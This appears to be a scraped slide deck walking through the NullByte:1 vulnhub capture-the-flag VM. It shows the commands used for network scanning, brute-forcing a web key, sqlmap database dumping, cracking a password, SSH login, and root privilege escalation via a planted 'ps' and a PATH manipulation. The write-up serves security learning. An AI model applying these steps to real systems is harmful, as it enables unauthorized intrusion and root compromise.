Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Exploiting null byte vm

This is a presentation on exploiting Null Byte VM. Null Byte VM is an vulnerable vm available on vulnhub.In this presentation I had exploited vm with various tools available on kali linux and then escalated privileges to become root.In this CTF challenge we have to find a flag i.e. proof.txt.

  • Login to see the comments

  • Be the first to like this

Exploiting null byte vm

  2. 2. ABOUT ME  Devansh Dubey  Volunteer at NULL Bhopal  Undergoing graduation from UIT RGPV  Cyber Security enthusiast  Twitter handle: @devanshdubey97
  3. 3. About Null Byte VM • Name: NullByte: 1 • Codename: NB0x01 • Date release: 1 Aug 2015 • Author: ly0n • Series: NullByte • Web page: • Download: • Objective: Get to /root/proof.txt and follow the instructions. • Level: Basic to intermediate. • Description: Boot2root, box will get IP from dhcp, works fine with virtualbox & vmware. • Operating System: Linux
  4. 4. Our Agenda: • Network Scanning (Nmap, netdiscover) • Exacting hidden text from an image obtained from IP(ExifTool) • Dictionary Attack using rockyou.txt(Burp suite) to obtain key. • Obtaining Database information via Sqlmap • Login to SSH on port 777 • Find SUID Binaries • Privilege Escalation by Manipulating $PATH • Get Root access and capture the flag(proof.txt)
  5. 5. LETS BEGIN 1. Netdiscover: Netdiscover is an ARP scanner to scan for live hosts in a range of network. In the first step we will find the target. We will use netdiscover, which is command line tool in kali linux to find the target • Netdiscover –r
  6. 6. NET DISCOVER RESULT Our target is And now since we know our target, we will scan it using nmap
  7. 7. 2. Nmap Scan • Our target is ,we will scan it using nmap. • nmap -A -A : For OS detection, version detection,script scanning,and traceroute. • Scanning the IP, we will know that the port number 80, 111, 777, 44607 are open and the service of SSH is forwarded from 22 to 777 port. Now we will try and open the targeted IP in the browser.
  9. 9. 3. Exiftool: Here is an image and a quote on the page. We will find nothing on the page and page source. Hence data can be hidden . To see the hidden data we will use exiftool which is an open source tool available on github. Available on:
  10. 10. There you will find a comment kzMb5nVYJw. Now this might be a directory so lets open it on browser. On opening it, we will see a text field which require a KEY.
  12. 12. 4. Dictionary Attack   • It is asking for a key, since it is a text field we will use the dictionary attack to find the key using BurpSuite and rockyou.txt. (rockyou.txt is an wordlist file available in /usr/share/wordlist directory).Through the dictionary attack, we will find the key i.e. elite.
  13. 13. 5. Using Sqlmap : • Through the dictionary attack we will find the key i.e. elite. After entering the key in the text field, the new web page will get opened which will be asking for username, but till now we didn’t knew the username. So, we will find it in its Database using sqlmap.  • sqlmap -u -- dbs –batch --batch: never ask for user input, use default behaviour. --dbs: databases
  14. 14. It will give you the name of the database i.e. information_schema,mysql,performance_schema,seth.  
  15. 15. 6. Now further we will find columns and tables and for that type: • sqlmap -u // -D seth -- dump-all –batch • dump-all : dump all dbms databases entry. • Once command executes, it will show you the table name along with column and password as shown:
  16. 16. Now we know username is ramses and password is in encrypted form .
  17. 17. 7. Password decoding: • Now we have username and password but the password is encrypted, so we need to crack it and there are many online tools to do so. • First decrypt with base64 • $ echo “YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=” | base64 –d • Then to crack it go to and give the md5 value there and click on ok and it will show you the original word i.e. omega
  18. 18. 8. Login through SSH Now we will SSH to log in and for that type: • ssh ramses@ -p 777 • After that give omega as the password. Once we login then by using the following command, we can enumerate all binaries having SUID permission. • find / -perm -u=s -type f 2>/dev/null • Here we found out that SUID bit enabled for /var/www/backup/procwatch
  19. 19. SUID ENABLED
  20. 20. 9. Privilege Escalation • cd /var/www/bakcup/ • ./procwatch Procwatch is security monitor written in Perl that watches a /proc filesystem for new processes. When a process is created, procwatch reports the time, the username, the PID, and the binary that was run. Its output is suitable for logging to log files and is geared for system administrators who are testing a new but as yet untrusted UNIX system. Procwatch is root owned that mean the file is running with root priviliges.
  21. 21. 10. Privilege Escalation • echo "/bin/sh"  > ps • chmod 777 ps • echo $PATH • export PATH=.:$PATH • echo $PATH • ./procwatch • Due to ‘.’ in $PATH means that the user is able to execute binaries/scripts from the current directory. Hence now on executing id command we will find ourselves as root. • id • cd /root • ls • cat proof.txt
  22. 22. FLAG FOUND!!
  23. 23. REFERENCES • Website: • Download: • Download (Mirror): • Download (Torrent):    ( Magnet)? • • • • •
  24. 24. Any Questions……??